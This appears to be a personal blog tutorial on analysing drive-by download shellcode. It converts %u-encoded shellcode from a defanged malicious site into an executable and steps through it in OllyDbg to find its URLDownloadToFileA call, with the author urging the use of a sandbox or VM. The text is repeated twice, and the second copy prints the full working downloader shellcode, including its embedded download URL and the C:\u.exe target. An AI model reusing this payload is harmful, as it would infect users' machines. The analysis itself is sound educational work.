Welcome to CHENOE 's Weblog!
Jun
1
If you keep reading my article from the first one, you will know what the 'shellcode' stands for, I thought. If you really don't understand what it is , it is recommend that you look back on what it was
http://www.chenoe.com/blog/read.php?14
So, how can I know this shellcode will download something from some place, or more exactly let me know what it did? Here we need to debug the shellcode. Shellcode is a part of an executable , you can consider it like this. If so, what it did must can be known by us clevers :) (my ego was increasing....just a joke, let's continue). Then, an old problem, how?
1, Start Redoce.
2, Read malicious site hxxp://www0.ibds3.cn/ccbf.css or other you want to debug, (but please remember to check if this shellcode is completely shown to you but not splited in many .js files.), select YT, right-click, then select, replace to %u, then we can get a part of shellcode like:
What's this stack of numbers!? Some experienced 'players' (ya, we are just the players) may begin reading the code , EB , emm, it represents 'jmp ..'. Now, no need to trouble ourselves a lot, give this heavy translating work to debugger (although it's a financial crisis, debugger must have their jobs done, what a bummer if debugger is striking!), move your hand , or , exactly , your mouse, Functions- Execute- 9>Shellcode to Exe, or just type 9, click [Begin].
Copy shellcode to the textbox upside, like:
Then click [Delete invaild chars] ,followed by [2 bytes xchg] (because they are %u , high bits need to be changed with lowb bits), the last [Generat EXE file], you will see an exe is now standing (or .. laying ..?) at the place you typed.
Then we start OllyDebug, 'the best ring-3 debugger' --- it's ads said like this. You don't need to know too much but these:
1. F8: Step over, execute a piece of code , of course it will consider all codes in a 'call' is also 'one' piece of code, so it will try to execute all of them at one time.
2. F7: Step into, silmiar with F8, differently it will consider a 'call' is consisted of may codes, it will step into a 'call'.
3. F2: Set breakpoint, a bp will tell debugger where to pause.
4. F9: Run, you need to let F9 co-operate with F2.
5. F4: Bp and Run, another state of F2+F9.
6. jmp: Jump with no condition
7. je/jz: Jump if zero jne/jnz:Jump if not zero
8. nop (0x90): = xchg eax,eax ; this command will take no action. this is what i need to replenish after some people asked me.
After program loaded, we are paused at 405000:
00405000 > /EB 54 jmp short 00405056
00405002 |8B75 3C mov esi, dword ptr [ebp+3C]
00405005 |8B7435 78 mov esi, dword ptr [ebp+esi+78]
Emm, a jmp, F8, let's jump together. Where? 405056, xor eax,eax? , zero the eax register, ignore it because we are all having a originally purpose--------- find url , so let's go deeper in this program:
00405056 33C0 xor eax, eax
00405058 64:0340 30 add eax, dword ptr fs:[eax+30]
0040505C 78 0C js short 0040506A
0040505E 8B40 0C mov eax, dword ptr [eax+C]
00405061 8B70 1C mov esi, dword ptr [eax+1C]
00405064 AD lods dword ptr [esi]
00405065 8B40 08 mov eax, dword ptr [eax+8]
We are coming to call 405002, please notice here you're DEBUGGING A DANGEROUS, MALICIOUS SHELLCODE, you may need to take notice whether it will connect to internet then download a bomb into your computer, if it will do like this, do carefully , don't chicly press an F8, if you did, then- game over, you need to repair your computer now but not debugging (of course, it's better debugging it in Sandboxie, VM, and this will not bring some damage to your real system.)
Press [Enter] to see it's commands, no calls, click [C] on Ollydebug to return.
00405074 BF 8E4E0EEC mov edi, EC0E4E8E
00405079 E8 84FFFFFF call 00405002
0040507E 83EC 04 sub esp, 4
Then we are arriving at the next one,call eax, OD tells us that eax is reference to LoadLibraryA, so program here is calling LoadLibraryA, this will allow a program load a dll into memory space. Often there is a GetProcAddress afterwards, F8, let's step over, I bet you don't want to deeply know how LoadLibraryA works because our purpose isn't that..
00405085 FFD0 call eax ; kernel32.LoadLibraryA
Somewhere behinds, a jmp brings eip to 4050C5, please notice, here call 4050A1 is a previous address, raise your head, oh no, raise your cursor, it's 'push ebx', followed by a call eax, so we need to F7 step into to see what trick it's doing.
0040509F /EB 24 jmp short 004050C5
004050A1 |53 push ebx
004050A2 |FFD0 call eax
004050A4 |5D pop ebp
004050A5 |BF 98FE8A0E mov edi, 0E8AFE98
004050AA |E8 53FFFFFF call 00405002
004050AF |83EC 04 sub esp, 4
004050B2 |832C24 62 sub dword ptr [esp], 62
004050B6 |FFD0 call eax
004050B8 |BF 7ED8E273 mov edi, 73E2D87E
004050BD |E8 40FFFFFF call 00405002
004050C2 |52 push edx
004050C3 |FFD0 call eax
004050C5 \E8 D7FFFFFF call 004050A1
Using URLDownloadToFileA(->urlmon.dll) in a hurry, this function allows program connect to internet then download a file to local drives,so in a trojan, URLDownloadToFile(A/W), URLDownloadToCacheFile(A/W) may cause your special attention!
004050A1 53 push ebx
004050A2 FFD0 call eax ; urlmon.URLDownloadToFileA
004050A4 5D pop ebp
F7, step into, we can see, here he is pushing the first param of URLDownloadToFileA, in other words, he is telling system, where,what,how i will download it. We can clearly see he pushed C:\u.exe (3rd param of URLDownloadToFileA, specific saving position.).If you are interested in it, you can step into URLDownloadToFileA, then you will found, it will convert ansi chars to unicode chars then call URLDownloadToFileW.Of course this is what we need to do some days(or months?) later, after all, this article is telling you how to debug a Shellcode in a simple way but not analysis the program :) , maybe you need to read some professional books but not listen to the joke made by me , a newbie in this area :) .
421379A4 8B5D 10 mov ebx, dword ptr [ebp+10]
421379A7 56 push esi
421379A8 8B75 0C mov esi, dword ptr [ebp+C] ; MyOutPut.004050CA
421379AB 57 push edi
So, end our article.
http://www.chenoe.com/blog/read.php?14
So, how can I know this shellcode will download something from some place, or more exactly let me know what it did? Here we need to debug the shellcode. Shellcode is a part of an executable , you can consider it like this. If so, what it did must can be known by us clevers :) (my ego was increasing....just a joke, let's continue). Then, an old problem, how?
1, Start Redoce.
2, Read malicious site hxxp://www0.ibds3.cn/ccbf.css or other you want to debug, (but please remember to check if this shellcode is completely shown to you but not splited in many .js files.), select YT, right-click, then select, replace to %u, then we can get a part of shellcode like:
%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u642F%u2E39%u7469%u7333%u2E35%u6F63%u2F6D%u3930%u782F%u632E%u7373%u0000
What's this stack of numbers!? Some experienced 'players' (ya, we are just the players) may begin reading the code , EB , emm, it represents 'jmp ..'. Now, no need to trouble ourselves a lot, give this heavy translating work to debugger (although it's a financial crisis, debugger must have their jobs done, what a bummer if debugger is striking!), move your hand , or , exactly , your mouse, Functions- Execute- 9>Shellcode to Exe, or just type 9, click [Begin].
Copy shellcode to the textbox upside, like:
Then click [Delete invaild chars] ,followed by [2 bytes xchg] (because they are %u , high bits need to be changed with lowb bits), the last [Generat EXE file], you will see an exe is now standing (or .. laying ..?) at the place you typed.
Then we start OllyDebug, 'the best ring-3 debugger' --- it's ads said like this. You don't need to know too much but these:
1. F8: Step over, execute a piece of code , of course it will consider all codes in a 'call' is also 'one' piece of code, so it will try to execute all of them at one time.
2. F7: Step into, silmiar with F8, differently it will consider a 'call' is consisted of may codes, it will step into a 'call'.
3. F2: Set breakpoint, a bp will tell debugger where to pause.
4. F9: Run, you need to let F9 co-operate with F2.
5. F4: Bp and Run, another state of F2+F9.
6. jmp: Jump with no condition
7. je/jz: Jump if zero jne/jnz:Jump if not zero
8. nop (0x90): = xchg eax,eax ; this command will take no action. this is what i need to replenish after some people asked me.
After program loaded, we are paused at 405000:
00405000 > /EB 54 jmp short 00405056
00405002 |8B75 3C mov esi, dword ptr [ebp+3C]
00405005 |8B7435 78 mov esi, dword ptr [ebp+esi+78]
Emm, a jmp, F8, let's jump together. Where? 405056, xor eax,eax? , zero the eax register, ignore it because we are all having a originally purpose--------- find url , so let's go deeper in this program:
00405056 33C0 xor eax, eax
00405058 64:0340 30 add eax, dword ptr fs:[eax+30]
0040505C 78 0C js short 0040506A
0040505E 8B40 0C mov eax, dword ptr [eax+C]
00405061 8B70 1C mov esi, dword ptr [eax+1C]
00405064 AD lods dword ptr [esi]
00405065 8B40 08 mov eax, dword ptr [eax+8]
We are coming to call 405002, please notice here you're DEBUGGING A DANGEROUS, MALICIOUS SHELLCODE, you may need to take notice whether it will connect to internet then download a bomb into your computer, if it will do like this, do carefully , don't chicly press an F8, if you did, then- game over, you need to repair your computer now but not debugging (of course, it's better debugging it in Sandboxie, VM, and this will not bring some damage to your real system.)
Press [Enter] to see it's commands, no calls, click [C] on Ollydebug to return.
00405074 BF 8E4E0EEC mov edi, EC0E4E8E
00405079 E8 84FFFFFF call 00405002
0040507E 83EC 04 sub esp, 4
Then we are arriving at the next one,call eax, OD tells us that eax is reference to LoadLibraryA, so program here is calling LoadLibraryA, this will allow a program load a dll into memory space. Often there is a GetProcAddress afterwards, F8, let's step over, I bet you don't want to deeply know how LoadLibraryA works because our purpose isn't that..
00405085 FFD0 call eax ; kernel32.LoadLibraryA
Somewhere behinds, a jmp brings eip to 4050C5, please notice, here call 4050A1 is a previous address, raise your head, oh no, raise your cursor, it's 'push ebx', followed by a call eax, so we need to F7 step into to see what trick it's doing.
0040509F /EB 24 jmp short 004050C5
004050A1 |53 push ebx
004050A2 |FFD0 call eax
004050A4 |5D pop ebp
004050A5 |BF 98FE8A0E mov edi, 0E8AFE98
004050AA |E8 53FFFFFF call 00405002
004050AF |83EC 04 sub esp, 4
004050B2 |832C24 62 sub dword ptr [esp], 62
004050B6 |FFD0 call eax
004050B8 |BF 7ED8E273 mov edi, 73E2D87E
004050BD |E8 40FFFFFF call 00405002
004050C2 |52 push edx
004050C3 |FFD0 call eax
004050C5 \E8 D7FFFFFF call 004050A1
Using URLDownloadToFileA(->urlmon.dll) in a hurry, this function allows program connect to internet then download a file to local drives,so in a trojan, URLDownloadToFile(A/W), URLDownloadToCacheFile(A/W) may cause your special attention!
004050A1 53 push ebx
004050A2 FFD0 call eax ; urlmon.URLDownloadToFileA
004050A4 5D pop ebp
F7, step into, we can see, here he is pushing the first param of URLDownloadToFileA, in other words, he is telling system, where,what,how i will download it. We can clearly see he pushed C:\u.exe (3rd param of URLDownloadToFileA, specific saving position.).If you are interested in it, you can step into URLDownloadToFileA, then you will found, it will convert ansi chars to unicode chars then call URLDownloadToFileW.Of course this is what we need to do some days(or months?) later, after all, this article is telling you how to debug a Shellcode in a simple way but not analysis the program :) , maybe you need to read some professional books but not listen to the joke made by me , a newbie in this area :) .
421379A4 8B5D 10 mov ebx, dword ptr [ebp+10]
421379A7 56 push esi
421379A8 8B75 0C mov esi, dword ptr [ebp+C] ; MyOutPut.004050CA
421379AB 57 push edi
So, end our article.
